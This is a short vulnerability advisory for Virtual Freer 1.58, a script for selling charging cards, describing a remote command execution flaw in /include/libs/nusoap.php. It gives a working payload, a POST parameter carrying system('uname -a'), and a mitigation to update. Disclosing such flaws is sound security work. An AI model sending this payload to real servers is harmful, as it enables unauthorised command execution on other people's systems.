vendor:
Virtual Freer
by:
SajjadBnd, BiskooitPedar, blackwolf@post.com
7.5
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: Virtual Freer
Affected Version From: 1.58
Affected Version To: 1.58
Patch Exists: YES
Related CWE: N/A
CPE: a:freer:virtual_freer
Metasploit:
N/A
Other Scripts:
N/A
Platforms Tested: Ubuntu 19.10
2020
Virtual Freer 1.58 – Remote Command Execution
Free Script For Sell Charging Cards and Virtual Products. Vulnerable file: /include/libs/nusoap.php. POST /include/libs/nusoap.php payload : a74ad8dfacd4f985eb3977517615ce25=system('uname -a');
Mitigation:
Update to the latest version of Virtual Freer